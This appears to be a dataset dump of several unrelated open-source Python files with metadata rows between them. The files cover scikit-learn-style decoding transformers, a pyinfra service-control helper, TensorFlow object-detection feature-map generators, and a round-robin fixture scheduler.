class SpatialFilter(_BaseEstimator):
def __init__(self, estimator):
self.estimator = estimator
assert_true(isinstance(estimator, TransformerMixin))
def fit(self, X, y=None):
n_epoch, n_chan, n_time = X.shape
# trial as time
X = np.transpose(X, [1, 0, 2]).reshape([n_chan, n_epoch * n_time]).T
self.estimator.fit(X)
return self
def fit_transform(self, X, y=None):
self.fit(X)
return self.transform(X)
def transform(self, X):
n_epoch, n_chan, n_time = X.shape
# trial as time
X = np.transpose(X, [1, 0, 2]).reshape([n_chan, n_epoch * n_time]).T
X = self.estimator.transform(X)
X = np.reshape(X.T, [-1, n_epoch, n_time]).transpose([1, 0, 2])
return X
class Reshaper(_BaseEstimator):
"""Transpose, concatenate and/or reshape data.
Parameters
----------
concatenate : int | None
Reshaping feature dimension e.g. np.concatenate(X, axis=concatenate).
Defaults to None.
transpose : array of int, shape(1 + n_dims) | None
Reshaping feature dimension e.g. X.transpose(transpose).
Defaults to None.
reshape : array, shape(n_dims) | None
Reshaping feature dimension e.g. X.reshape(np.r_[len(X), shape]).
Defaults to -1 if concatenate or transpose is None, else defaults
to None.
"""
def __init__(self, reshape=None, transpose=None, concatenate=None,
verbose=False):
if (reshape is None) and (transpose is None) and (concatenate is None):
reshape = [-1]
self.reshape = reshape
self.transpose = transpose
self.concatenate = concatenate
self.verbose = verbose
def fit(self, X, y=None):
self.shape_ = X.shape[1:]
return self
def fit_transform(self, X, y=None):
return self.fit(X, y).transform(X)
def transform(self, X, y=None):
if self.transpose is not None:
X = X.transpose(self.transpose)
if self.concatenate:
X = np.concatenate(X, self.concatenate)
if self.reshape is not None:
X = np.reshape(X, np.hstack((X.shape[0], self.reshape)))
if self.verbose:
print(self.shape_, '->', (X.shape[1:]))
return X
class LightTimeDecoding(_BaseEstimator):
def __init__(self, estimator=None, method='predict', n_jobs=1):
self.estimator = (LogisticRegression() if estimator is None
else estimator)
self.method = method
assert_true(self.method in ['predict', 'predict_proba'])
assert_true(hasattr(self.estimator, method))
self.n_jobs = n_jobs
assert_true(isinstance(self.n_jobs, int))
def fit_transform(self, X, y):
return self.fit(X, y).transform(X)
def fit(self, X, y):
self.estimators_ = list()
parallel, p_func, n_jobs = parallel_func(_fit, self.n_jobs)
estimators = parallel(
p_func(self.estimator, split, y)
for split in np.array_split(X, n_jobs, axis=2))
self.estimators_ = np.concatenate(estimators, 0)
return self
def transform(self, X):
parallel, p_func, n_jobs = parallel_func(_predict_decod, self.n_jobs)
X_splits = np.array_split(X, n_jobs, axis=2)
est_splits = np.array_split(self.estimators_, n_jobs)
y_pred = parallel(
p_func(est_split, x_split, self.method)
for (est_split, x_split) in zip(est_splits, X_splits))
if n_jobs > 1:
y_pred = np.concatenate(y_pred, axis=1)
else:
y_pred = y_pred[0]
return y_pred
def predict(self, X):
return self.transform(X)
def predict_proba(self, X):
return self.transform(X)
def _fit(estimator, X, y):
estimators_ = list()
for ii in range(X.shape[2]):
est = clone(estimator)
est.fit(X[:, :, ii], y)
estimators_.append(est)
return estimators_
def _predict_decod(estimators, X, method):
n_sample, n_chan, n_time = X.shape
y_pred = np.array((n_sample, n_time))
for ii, est in enumerate(estimators):
if method == 'predict':
_y_pred = est.predict(X[:, :, ii])
elif method == 'predict_proba':
_y_pred = est.predict_proba(X[:, :, ii])
# init
if ii == 0:
y_pred = _init_pred(_y_pred, X)
y_pred[:, ii, ...] = _y_pred
return y_pred
def _init_pred(y_pred, X):
n_sample, n_chan, n_time = X.shape
if y_pred.ndim == 2:
y_pred = np.zeros((n_sample, n_time, y_pred.shape[-1]))
else:
y_pred = np.zeros((n_sample, n_time))
return y_pred
class LightGAT(LightTimeDecoding):
def transform(self, X):
parallel, p_func, n_jobs = parallel_func(_predict_gat, self.n_jobs)
y_pred = parallel(
p_func(self.estimators_, x_split, self.method)
for x_split in np.array_split(X, n_jobs, axis=2))
y_pred = np.concatenate(y_pred, axis=2)
return y_pred
def _predict_gat(estimators, X, method):
n_sample, n_chan, n_time = X.shape
for ii, est in enumerate(estimators):
X_stack = np.transpose(X, [1, 0, 2])
X_stack = np.reshape(X_stack, [n_chan, n_sample * n_time]).T
if method == 'predict':
_y_pred = est.predict(X_stack)
_y_pred = np.reshape(_y_pred, [n_sample, n_time])
elif method == 'predict_proba':
_y_pred = est.predict_proba(X_stack)
n_dim = _y_pred.shape[-1]
_y_pred = np.reshape(_y_pred, [n_sample, n_time, n_dim])
# init
if ii == 0:
y_pred = _init_pred_gat(_y_pred, X, len(estimators))
y_pred[:, ii, ...] = _y_pred
return y_pred
def _init_pred_gat(y_pred, X, n_train):
n_sample, n_chan, n_time = X.shape
if y_pred.ndim == 3:
y_pred = np.zeros((n_sample, n_train, n_time, y_pred.shape[-1]))
else:
y_pred = np.zeros((n_sample, n_train, n_time))
return y_pred
class CustomEnsemble(TransformerMixin):
def __init__(self, estimators, method='predict'):
self.estimators = estimators
self.method = method
assert_true(method in ['predict', 'predict_proba'])
def fit(self, X, y=None):
for estimator in self.estimators:
estimator.fit(X, y)
return self
def fit_transform(self, X, y=None):
self.fit(X, y)
return self.transform(X)
def transform(self, X):
all_Xt = list()
for estimator in self.estimators:
if self.method == 'predict':
Xt = estimator.predict(X)
elif self.method == 'predict_proba':
Xt = estimator.predict_proba(X)
all_Xt.append(Xt)
all_Xt = np.c_[all_Xt].T
return all_Xt
def get_params(self, deep=True):
return dict(estimators=self.estimators, method=self.method)
class GenericTransformer(_BaseEstimator):
def __init__(self, function, **fit_params):
self.function = function
self.fit_params = fit_params
def fit(self, X, y=None):
return self
def transform(self, X, y=None):
return self.function(X, **self.fit_params)
def fit_transform(self, X, y=None):
return self.transform(X, y)
class TimeEmbedder(_BaseEstimator):
def __init__(self, delays=2):
self.delays = delays
def transform(self, X, y=None):
if not isinstance(X, np.ndarray):
epochs = X
X = epochs._data
if isinstance(self.delays, int):
delays = range(1, self.delays)
else:
delays = self.delays
X2 = []
for x in X:
tmp = x
for d in delays:
tmp = np.r_[tmp, np.roll(x, d, axis=-1)]
X2.append(tmp)
X2 = np.array(X2)
return X2
def fit_transform(self, X, y=None):
return self.fit(X).transform(X, y)
class Windower(TransformerMixin, BaseEstimator):
"""To make sliding windows
Parameters
----------
size : int
The window size.
step : int
The window step.
vectorize : bool
Returns arrays or vector.
"""
def __init__(self, size=1, step=1, vectorize=False):
self.size = size
self.step = step
self.vectorize = vectorize
def fit(self, X, y=None):
"""Does nothing, for sklearn compatibility purposes
Parameters
----------
X : ndarray, shape(n_epochs, n_times, n_features)
The target data.
y : None | array, shape(n_epochs,)
Returns
-------
self : self
"""
if X.ndim != 3:
raise ValueError('expects 3D array')
return self
def transform(self, X, y=None):
"""Generate windows from X.
Parameters
----------
X : ndarray, shape(n_epochs, n_times, n_features)
The target data.
y : None | array, shape(n_epochs,)
Returns
-------
Xt : ndarray, shape(n_epochs, n_features, n_window_times, n_windows)
The transformed data. If vectorize is True, then shape is
(n_epochs, -1).
"""
Xt = list()
for time in range(0, X.shape[2] - self.size, self.step):
Xt.append(X[:, :, time:(time + self.size)])
Xt = np.transpose(Xt, [1, 2, 3, 0]) # trial chan window time
if self.vectorize:
Xt = Xt.reshape([len(Xt), -1, Xt.shape[-1]])
return Xt
def fit_transform(self, X, y=None):
"""Generate windows from X.
Parameters
----------
X : ndarray, shape(n_epochs, n_times, n_features)
The target data.
y : None | array, shape(n_epochs,)
Returns
-------
Xt : ndarray, shape(n_epochs, n_features, n_window_times, n_windows)
The transformed data. If vectorize is True, then shape is
(n_epochs, -1).
"""
return self.fit(X).transform(X)
def test_windower():
Windower(3, 2, False).transform(np.zeros((2, 30, 100))).shape
| bsd-2-clause | -8,381,013,809,890,856,000 | 29.823651 | 79 | 0.558053 | false | 3.511463 | false | false | false |
Fizzadar/pyinfra | pyinfra/operations/util/service.py | 1 | 2358 | def handle_service_control(
host,
name, fact_cls, formatter, running, restarted, reloaded, command,
status_argument='status',
):
statuses = host.get_fact(fact_cls)
status = statuses.get(name, None)
# If we don't know the status, we need to check if it's up before starting
# and/or restarting/reloading
if status is None:
yield '''
# If the service is running
if {status_command}; then
{stop_command}
{restart_command}
{reload_command}
# If the service is not running, we just start it (no re[start|load])
else
{start_command}
fi
'''.format(
status_command=formatter.format(name, status_argument),
start_command=(
formatter.format(name, 'start')
if running is True else 'true'
),
stop_command=(
formatter.format(name, 'stop')
if running is False else 'true'
),
restart_command=(
formatter.format(name, 'restart')
if restarted else 'true'
),
reload_command=(
formatter.format(name, 'reload')
if reloaded else 'true'
),
)
statuses[name] = running
else:
# Need down but running
if running is False:
if status:
yield formatter.format(name, 'stop')
statuses[name] = False
else:
host.noop('service {0} is stopped'.format(name))
# Need running but down
if running is True:
if not status:
yield formatter.format(name, 'start')
statuses[name] = True
else:
host.noop('service {0} is running'.format(name))
# Only restart if the service is already running
if restarted and status:
yield formatter.format(name, 'restart')
# Only reload if the service is already reloaded
if reloaded and status:
yield formatter.format(name, 'reload')
# Always execute arbitrary commands as these may or may not rely on the service
# being up or down
if command:
yield formatter.format(name, command)
| mit | -6,873,257,825,784,884,000 | 31.75 | 83 | 0.529686 | false | 4.782961 | false | false | false |
derekjchow/models | research/object_detection/models/feature_map_generators.py | 1 | 25937 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functions to generate a list of feature maps based on image features.
Provides several feature map generators that can be used to build object
detection feature extractors.
Object detection feature extractors are usually built by stacking two
components: a base feature extractor such as Inception V3 and a feature map
generator.
Feature map generators build on the base feature extractors and produce a list
of final feature maps.
"""
import collections
import functools
import tensorflow as tf
from object_detection.utils import ops
slim = tf.contrib.slim
# Activation bound used for TPU v1. Activations will be clipped to
# [-ACTIVATION_BOUND, ACTIVATION_BOUND] when training with
# use_bounded_activations enabled.
ACTIVATION_BOUND = 6.0
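# Illustrative sketch (not part of this module's API): a bounded-activation
# setup typically clips features as
#   clipped = tf.clip_by_value(features, -ACTIVATION_BOUND, ACTIVATION_BOUND)
# so that activation magnitudes stay within a range TPU v1 handles well.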
def get_depth_fn(depth_multiplier, min_depth):
"""Builds a callable to compute depth (output channels) of conv filters.
Args:
depth_multiplier: a multiplier for the nominal depth.
min_depth: a lower bound on the depth of filters.
Returns:
A callable that takes in a nominal depth and returns the depth to use.
"""
def multiply_depth(depth):
new_depth = int(depth * depth_multiplier)
return max(new_depth, min_depth)
return multiply_depth
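# Example with illustrative values: for depth_multiplier=0.5 and min_depth=16,
#   depth_fn = get_depth_fn(0.5, 16)
#   depth_fn(256)  # -> 128, i.e. int(256 * 0.5)
#   depth_fn(24)   # -> 16, since int(24 * 0.5) = 12 falls below min_depth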
class KerasMultiResolutionFeatureMaps(tf.keras.Model):
"""Generates multi resolution feature maps from input image features.
A Keras model that generates multi-scale feature maps for detection as in the
  SSD papers by Liu et al: https://arxiv.org/pdf/1512.02325v2.pdf, see Sec 2.1.
More specifically, when called on inputs it performs the following two tasks:
1) If a layer name is provided in the configuration, returns that layer as a
feature map.
2) If a layer name is left as an empty string, constructs a new feature map
based on the spatial shape and depth configuration. Note that the current
implementation only supports generating new layers using convolution of
stride 2 resulting in a spatial resolution reduction by a factor of 2.
By default convolution kernel size is set to 3, and it can be customized
by caller.
An example of the configuration for Inception V3:
{
'from_layer': ['Mixed_5d', 'Mixed_6e', 'Mixed_7c', '', '', ''],
'layer_depth': [-1, -1, -1, 512, 256, 128]
}
When this feature generator object is called on input image_features:
Args:
image_features: A dictionary of handles to activation tensors from the
base feature extractor.
Returns:
feature_maps: an OrderedDict mapping keys (feature map names) to
tensors where each tensor has shape [batch, height_i, width_i, depth_i].
"""
def __init__(self,
feature_map_layout,
depth_multiplier,
min_depth,
insert_1x1_conv,
is_training,
conv_hyperparams,
freeze_batchnorm,
name=None):
"""Constructor.
Args:
feature_map_layout: Dictionary of specifications for the feature map
layouts in the following format (Inception V2/V3 respectively):
{
'from_layer': ['Mixed_3c', 'Mixed_4c', 'Mixed_5c', '', '', ''],
'layer_depth': [-1, -1, -1, 512, 256, 128]
}
or
{
'from_layer': ['Mixed_5d', 'Mixed_6e', 'Mixed_7c', '', '', ''],
'layer_depth': [-1, -1, -1, 512, 256, 128]
}
If 'from_layer' is specified, the specified feature map is directly used
        as a box predictor layer, and the layer_depth is directly inferred from
the feature map (instead of using the provided 'layer_depth' parameter).
In this case, our convention is to set 'layer_depth' to -1 for clarity.
Otherwise, if 'from_layer' is an empty string, then the box predictor
layer will be built from the previous layer using convolution
operations. Note that the current implementation only supports
generating new layers using convolutions of stride 2 (resulting in a
spatial resolution reduction by a factor of 2), and will be extended to
a more flexible design. Convolution kernel size is set to 3 by default,
        and can be customized by 'conv_kernel_size' parameter (similarly,
'conv_kernel_size' should be set to -1 if 'from_layer' is specified).
The created convolution operation will be a normal 2D convolution by
default, and a depthwise convolution followed by 1x1 convolution if
'use_depthwise' is set to True.
depth_multiplier: Depth multiplier for convolutional layers.
min_depth: Minimum depth for convolutional layers.
insert_1x1_conv: A boolean indicating whether an additional 1x1
convolution should be inserted before shrinking the feature map.
is_training: Indicates whether the feature generator is in training mode.
conv_hyperparams: A `hyperparams_builder.KerasLayerHyperparams` object
containing hyperparameters for convolution ops.
freeze_batchnorm: Bool. Whether to freeze batch norm parameters during
training or not. When training with a small batch size (e.g. 1), it is
desirable to freeze batch norm update and use pretrained batch norm
params.
name: A string name scope to assign to the model. If 'None', Keras
will auto-generate one from the class name.
"""
super(KerasMultiResolutionFeatureMaps, self).__init__(name=name)
self.feature_map_layout = feature_map_layout
self.convolutions = []
depth_fn = get_depth_fn(depth_multiplier, min_depth)
base_from_layer = ''
use_explicit_padding = False
if 'use_explicit_padding' in feature_map_layout:
use_explicit_padding = feature_map_layout['use_explicit_padding']
use_depthwise = False
if 'use_depthwise' in feature_map_layout:
use_depthwise = feature_map_layout['use_depthwise']
for index, from_layer in enumerate(feature_map_layout['from_layer']):
net = []
layer_depth = feature_map_layout['layer_depth'][index]
conv_kernel_size = 3
if 'conv_kernel_size' in feature_map_layout:
conv_kernel_size = feature_map_layout['conv_kernel_size'][index]
if from_layer:
base_from_layer = from_layer
else:
if insert_1x1_conv:
layer_name = '{}_1_Conv2d_{}_1x1_{}'.format(
base_from_layer, index, depth_fn(layer_depth / 2))
net.append(tf.keras.layers.Conv2D(depth_fn(layer_depth / 2),
[1, 1],
padding='SAME',
strides=1,
name=layer_name + '_conv',
**conv_hyperparams.params()))
net.append(
conv_hyperparams.build_batch_norm(
training=(is_training and not freeze_batchnorm),
name=layer_name + '_batchnorm'))
net.append(
conv_hyperparams.build_activation_layer(
name=layer_name))
layer_name = '{}_2_Conv2d_{}_{}x{}_s2_{}'.format(
base_from_layer, index, conv_kernel_size, conv_kernel_size,
depth_fn(layer_depth))
stride = 2
padding = 'SAME'
if use_explicit_padding:
padding = 'VALID'
# We define this function here while capturing the value of
# conv_kernel_size, to avoid holding a reference to the loop variable
# conv_kernel_size inside of a lambda function
def fixed_padding(features, kernel_size=conv_kernel_size):
return ops.fixed_padding(features, kernel_size)
net.append(tf.keras.layers.Lambda(fixed_padding))
# TODO(rathodv): Add some utilities to simplify the creation of
# Depthwise & non-depthwise convolutions w/ normalization & activations
if use_depthwise:
net.append(tf.keras.layers.DepthwiseConv2D(
[conv_kernel_size, conv_kernel_size],
depth_multiplier=1,
padding=padding,
strides=stride,
name=layer_name + '_depthwise_conv',
**conv_hyperparams.params()))
net.append(
conv_hyperparams.build_batch_norm(
training=(is_training and not freeze_batchnorm),
name=layer_name + '_depthwise_batchnorm'))
net.append(
conv_hyperparams.build_activation_layer(
name=layer_name + '_depthwise'))
net.append(tf.keras.layers.Conv2D(depth_fn(layer_depth), [1, 1],
padding='SAME',
strides=1,
name=layer_name + '_conv',
**conv_hyperparams.params()))
net.append(
conv_hyperparams.build_batch_norm(
training=(is_training and not freeze_batchnorm),
name=layer_name + '_batchnorm'))
net.append(
conv_hyperparams.build_activation_layer(
name=layer_name))
else:
net.append(tf.keras.layers.Conv2D(
depth_fn(layer_depth),
[conv_kernel_size, conv_kernel_size],
padding=padding,
strides=stride,
name=layer_name + '_conv',
**conv_hyperparams.params()))
net.append(
conv_hyperparams.build_batch_norm(
training=(is_training and not freeze_batchnorm),
name=layer_name + '_batchnorm'))
net.append(
conv_hyperparams.build_activation_layer(
name=layer_name))
# Until certain bugs are fixed in checkpointable lists,
# this net must be appended only once it's been filled with layers
self.convolutions.append(net)
def call(self, image_features):
"""Generate the multi-resolution feature maps.
Executed when calling the `.__call__` method on input.
Args:
image_features: A dictionary of handles to activation tensors from the
base feature extractor.
Returns:
feature_maps: an OrderedDict mapping keys (feature map names) to
tensors where each tensor has shape [batch, height_i, width_i, depth_i].
"""
feature_maps = []
feature_map_keys = []
for index, from_layer in enumerate(self.feature_map_layout['from_layer']):
if from_layer:
feature_map = image_features[from_layer]
feature_map_keys.append(from_layer)
else:
feature_map = feature_maps[-1]
for layer in self.convolutions[index]:
feature_map = layer(feature_map)
layer_name = self.convolutions[index][-1].name
feature_map_keys.append(layer_name)
feature_maps.append(feature_map)
return collections.OrderedDict(
[(x, y) for (x, y) in zip(feature_map_keys, feature_maps)])
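# Minimal usage sketch (hypothetical tensor names; `conv_hyperparams` is
# assumed to be a hyperparams_builder.KerasLayerHyperparams built elsewhere):
#   feature_map_generator = KerasMultiResolutionFeatureMaps(
#       feature_map_layout={
#           'from_layer': ['Mixed_5d', 'Mixed_6e', 'Mixed_7c', '', '', ''],
#           'layer_depth': [-1, -1, -1, 512, 256, 128]},
#       depth_multiplier=1.0,
#       min_depth=16,
#       insert_1x1_conv=True,
#       is_training=True,
#       conv_hyperparams=conv_hyperparams,
#       freeze_batchnorm=False)
#   feature_maps = feature_map_generator(
#       {'Mixed_5d': mixed_5d, 'Mixed_6e': mixed_6e, 'Mixed_7c': mixed_7c})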
def multi_resolution_feature_maps(feature_map_layout, depth_multiplier,
min_depth, insert_1x1_conv, image_features,
pool_residual=False):
"""Generates multi resolution feature maps from input image features.
Generates multi-scale feature maps for detection as in the SSD papers by
  Liu et al: https://arxiv.org/pdf/1512.02325v2.pdf. See Sec 2.1.
More specifically, it performs the following two tasks:
1) If a layer name is provided in the configuration, returns that layer as a
feature map.
2) If a layer name is left as an empty string, constructs a new feature map
based on the spatial shape and depth configuration. Note that the current
implementation only supports generating new layers using convolution of
stride 2 resulting in a spatial resolution reduction by a factor of 2.
By default convolution kernel size is set to 3, and it can be customized
by caller.
An example of the configuration for Inception V3:
{
'from_layer': ['Mixed_5d', 'Mixed_6e', 'Mixed_7c', '', '', ''],
'layer_depth': [-1, -1, -1, 512, 256, 128]
}
Args:
feature_map_layout: Dictionary of specifications for the feature map
layouts in the following format (Inception V2/V3 respectively):
{
'from_layer': ['Mixed_3c', 'Mixed_4c', 'Mixed_5c', '', '', ''],
'layer_depth': [-1, -1, -1, 512, 256, 128]
}
or
{
'from_layer': ['Mixed_5d', 'Mixed_6e', 'Mixed_7c', '', '', ''],
'layer_depth': [-1, -1, -1, 512, 256, 128]
}
If 'from_layer' is specified, the specified feature map is directly used
    as a box predictor layer, and the layer_depth is directly inferred from the
feature map (instead of using the provided 'layer_depth' parameter). In
this case, our convention is to set 'layer_depth' to -1 for clarity.
Otherwise, if 'from_layer' is an empty string, then the box predictor
layer will be built from the previous layer using convolution operations.
Note that the current implementation only supports generating new layers
using convolutions of stride 2 (resulting in a spatial resolution
reduction by a factor of 2), and will be extended to a more flexible
design. Convolution kernel size is set to 3 by default, and can be
    customized by 'conv_kernel_size' parameter (similarly, 'conv_kernel_size'
should be set to -1 if 'from_layer' is specified). The created convolution
operation will be a normal 2D convolution by default, and a depthwise
convolution followed by 1x1 convolution if 'use_depthwise' is set to True.
depth_multiplier: Depth multiplier for convolutional layers.
min_depth: Minimum depth for convolutional layers.
insert_1x1_conv: A boolean indicating whether an additional 1x1 convolution
should be inserted before shrinking the feature map.
image_features: A dictionary of handles to activation tensors from the
base feature extractor.
pool_residual: Whether to add an average pooling layer followed by a
residual connection between subsequent feature maps when the channel
depth match. For example, with option 'layer_depth': [-1, 512, 256, 256],
    a pooling and residual layer is added between the third and fourth feature
map. This option is better used with Weight Shared Convolution Box
Predictor when all feature maps have the same channel depth to encourage
more consistent features across multi-scale feature maps.
Returns:
feature_maps: an OrderedDict mapping keys (feature map names) to
tensors where each tensor has shape [batch, height_i, width_i, depth_i].
Raises:
    ValueError: if the number of entries in 'from_layer' and
'layer_depth' do not match.
ValueError: if the generated layer does not have the same resolution
as specified.
"""
depth_fn = get_depth_fn(depth_multiplier, min_depth)
feature_map_keys = []
feature_maps = []
base_from_layer = ''
use_explicit_padding = False
if 'use_explicit_padding' in feature_map_layout:
use_explicit_padding = feature_map_layout['use_explicit_padding']
use_depthwise = False
if 'use_depthwise' in feature_map_layout:
use_depthwise = feature_map_layout['use_depthwise']
for index, from_layer in enumerate(feature_map_layout['from_layer']):
layer_depth = feature_map_layout['layer_depth'][index]
conv_kernel_size = 3
if 'conv_kernel_size' in feature_map_layout:
conv_kernel_size = feature_map_layout['conv_kernel_size'][index]
if from_layer:
feature_map = image_features[from_layer]
base_from_layer = from_layer
feature_map_keys.append(from_layer)
else:
pre_layer = feature_maps[-1]
pre_layer_depth = pre_layer.get_shape().as_list()[3]
intermediate_layer = pre_layer
if insert_1x1_conv:
layer_name = '{}_1_Conv2d_{}_1x1_{}'.format(
base_from_layer, index, depth_fn(layer_depth / 2))
intermediate_layer = slim.conv2d(
pre_layer,
depth_fn(layer_depth / 2), [1, 1],
padding='SAME',
stride=1,
scope=layer_name)
layer_name = '{}_2_Conv2d_{}_{}x{}_s2_{}'.format(
base_from_layer, index, conv_kernel_size, conv_kernel_size,
depth_fn(layer_depth))
stride = 2
padding = 'SAME'
if use_explicit_padding:
padding = 'VALID'
intermediate_layer = ops.fixed_padding(
intermediate_layer, conv_kernel_size)
if use_depthwise:
feature_map = slim.separable_conv2d(
intermediate_layer,
None, [conv_kernel_size, conv_kernel_size],
depth_multiplier=1,
padding=padding,
stride=stride,
scope=layer_name + '_depthwise')
feature_map = slim.conv2d(
feature_map,
depth_fn(layer_depth), [1, 1],
padding='SAME',
stride=1,
scope=layer_name)
if pool_residual and pre_layer_depth == depth_fn(layer_depth):
feature_map += slim.avg_pool2d(
pre_layer, [3, 3],
padding='SAME',
stride=2,
scope=layer_name + '_pool')
else:
feature_map = slim.conv2d(
intermediate_layer,
depth_fn(layer_depth), [conv_kernel_size, conv_kernel_size],
padding=padding,
stride=stride,
scope=layer_name)
feature_map_keys.append(layer_name)
feature_maps.append(feature_map)
return collections.OrderedDict(
[(x, y) for (x, y) in zip(feature_map_keys, feature_maps)])
def fpn_top_down_feature_maps(image_features,
depth,
use_depthwise=False,
use_explicit_padding=False,
use_bounded_activations=False,
scope=None,
use_native_resize_op=False):
"""Generates `top-down` feature maps for Feature Pyramid Networks.
See https://arxiv.org/abs/1612.03144 for details.
Args:
image_features: list of tuples of (tensor_name, image_feature_tensor).
      Spatial resolutions of successive tensors must reduce exactly by a factor
of 2.
depth: depth of output feature maps.
use_depthwise: whether to use depthwise separable conv instead of regular
conv.
use_explicit_padding: whether to use explicit padding.
use_bounded_activations: Whether or not to clip activations to range
[-ACTIVATION_BOUND, ACTIVATION_BOUND]. Bounded activations better lend
themselves to quantized inference.
scope: A scope name to wrap this op under.
use_native_resize_op: If True, uses tf.image.resize_nearest_neighbor op for
the upsampling process instead of reshape and broadcasting implementation.
Returns:
feature_maps: an OrderedDict mapping keys (feature map names) to
tensors where each tensor has shape [batch, height_i, width_i, depth_i].
"""
with tf.name_scope(scope, 'top_down'):
num_levels = len(image_features)
output_feature_maps_list = []
output_feature_map_keys = []
padding = 'VALID' if use_explicit_padding else 'SAME'
kernel_size = 3
with slim.arg_scope(
[slim.conv2d, slim.separable_conv2d], padding=padding, stride=1):
top_down = slim.conv2d(
image_features[-1][1],
depth, [1, 1], activation_fn=None, normalizer_fn=None,
scope='projection_%d' % num_levels)
if use_bounded_activations:
top_down = tf.clip_by_value(top_down, -ACTIVATION_BOUND,
ACTIVATION_BOUND)
output_feature_maps_list.append(top_down)
output_feature_map_keys.append(
'top_down_%s' % image_features[-1][0])
for level in reversed(range(num_levels - 1)):
if use_native_resize_op:
with tf.name_scope('nearest_neighbor_upsampling'):
top_down_shape = top_down.shape.as_list()
top_down = tf.image.resize_nearest_neighbor(
top_down, [top_down_shape[1] * 2, top_down_shape[2] * 2])
else:
top_down = ops.nearest_neighbor_upsampling(top_down, scale=2)
residual = slim.conv2d(
image_features[level][1], depth, [1, 1],
activation_fn=None, normalizer_fn=None,
scope='projection_%d' % (level + 1))
if use_bounded_activations:
residual = tf.clip_by_value(residual, -ACTIVATION_BOUND,
ACTIVATION_BOUND)
if use_explicit_padding:
# slice top_down to the same shape as residual
residual_shape = tf.shape(residual)
top_down = top_down[:, :residual_shape[1], :residual_shape[2], :]
top_down += residual
if use_bounded_activations:
top_down = tf.clip_by_value(top_down, -ACTIVATION_BOUND,
ACTIVATION_BOUND)
if use_depthwise:
conv_op = functools.partial(slim.separable_conv2d, depth_multiplier=1)
else:
conv_op = slim.conv2d
if use_explicit_padding:
top_down = ops.fixed_padding(top_down, kernel_size)
output_feature_maps_list.append(conv_op(
top_down,
depth, [kernel_size, kernel_size],
scope='smoothing_%d' % (level + 1)))
output_feature_map_keys.append('top_down_%s' % image_features[level][0])
return collections.OrderedDict(reversed(
list(zip(output_feature_map_keys, output_feature_maps_list))))
def pooling_pyramid_feature_maps(base_feature_map_depth, num_layers,
image_features, replace_pool_with_conv=False):
"""Generates pooling pyramid feature maps.
  The pooling pyramid feature maps are motivated by
  multi_resolution_feature_maps. The main differences are that it is simpler and
reduces the number of free parameters.
More specifically:
  - Instead of using convolutions to shrink the feature map, it uses max
    pooling, which removes the convolution parameters entirely.
- By pooling feature from larger map up to a single cell, it generates
features in the same feature space.
  - Instead of independently making box predictions from individual maps, it
    shares the same classifier across different feature maps, thereby reducing
    the "mis-calibration" across different scales.
See go/ppn-detection for more details.
Args:
base_feature_map_depth: Depth of the base feature before the max pooling.
num_layers: Number of layers used to make predictions. They are pooled
from the base feature.
image_features: A dictionary of handles to activation tensors from the
feature extractor.
replace_pool_with_conv: Whether or not to replace pooling operations with
convolutions in the PPN. Default is False.
Returns:
feature_maps: an OrderedDict mapping keys (feature map names) to
tensors where each tensor has shape [batch, height_i, width_i, depth_i].
Raises:
ValueError: image_features does not contain exactly one entry
"""
if len(image_features) != 1:
raise ValueError('image_features should be a dictionary of length 1.')
  image_features = image_features[list(image_features.keys())[0]]
feature_map_keys = []
feature_maps = []
feature_map_key = 'Base_Conv2d_1x1_%d' % base_feature_map_depth
if base_feature_map_depth > 0:
image_features = slim.conv2d(
image_features,
base_feature_map_depth,
[1, 1], # kernel size
padding='SAME', stride=1, scope=feature_map_key)
# Add a 1x1 max-pooling node (a no op node) immediately after the conv2d for
# TPU v1 compatibility. Without the following dummy op, TPU runtime
# compiler will combine the convolution with one max-pooling below into a
# single cycle, so getting the conv2d feature becomes impossible.
image_features = slim.max_pool2d(
image_features, [1, 1], padding='SAME', stride=1, scope=feature_map_key)
feature_map_keys.append(feature_map_key)
feature_maps.append(image_features)
feature_map = image_features
if replace_pool_with_conv:
with slim.arg_scope([slim.conv2d], padding='SAME', stride=2):
for i in range(num_layers - 1):
feature_map_key = 'Conv2d_{}_3x3_s2_{}'.format(i,
base_feature_map_depth)
feature_map = slim.conv2d(
feature_map, base_feature_map_depth, [3, 3], scope=feature_map_key)
feature_map_keys.append(feature_map_key)
feature_maps.append(feature_map)
else:
with slim.arg_scope([slim.max_pool2d], padding='SAME', stride=2):
for i in range(num_layers - 1):
feature_map_key = 'MaxPool2d_%d_2x2' % i
feature_map = slim.max_pool2d(
feature_map, [2, 2], padding='SAME', scope=feature_map_key)
feature_map_keys.append(feature_map_key)
feature_maps.append(feature_map)
return collections.OrderedDict(
[(x, y) for (x, y) in zip(feature_map_keys, feature_maps)])
| apache-2.0 | -2,083,562,005,663,669,000 | 43.488851 | 80 | 0.635309 | false | 4.039402 | true | false | false |
anttisalonen/freekick | src/freekick/gui/round_robin.py | 1 | 1369 | #!/usr/bin/python
import sys
def round_robin(ls):
clubs = list(ls)
num_clubs = len(clubs)
# add dummy club if necessary
if num_clubs % 2 == 1:
have_dummy = True
clubs.append(0)
num_clubs += 1
else:
have_dummy = False
# take last club as base
baseclub = clubs[-1]
clubs = clubs[:-1]
num_rounds = num_clubs - 1
half_clubs = num_clubs / 2
rounds = []
for r in range(num_rounds):
homeclubs = []
awayclubs = []
homeclubs.append(baseclub)
for i in range(half_clubs + 1):
homeclubs.append(clubs[i])
for i in range(num_clubs - 2, half_clubs - 2, -1):
awayclubs.append(clubs[i])
if r % 2 == 0:
rounds.append(zip(homeclubs, awayclubs))
else:
rounds.append(zip(awayclubs, homeclubs))
clubs.append(clubs.pop(0))
if have_dummy:
for matches in rounds:
del matches[0]
return rounds
if __name__ == "__main__":
default_num_clubs = 6
# parse command line
if len(sys.argv) > 1:
num_clubs = int(sys.argv[1])
else:
num_clubs = default_num_clubs
# generate clubs
clubs = range(1, num_clubs + 1)
rounds = round_robin(clubs)
print len(rounds)
for r in rounds:
print len(r),
print r
| agpl-3.0 | -9,599,687,282,898,360 | 20.390625 | 58 | 0.535427 | false | 3.221176 | false | false | false |
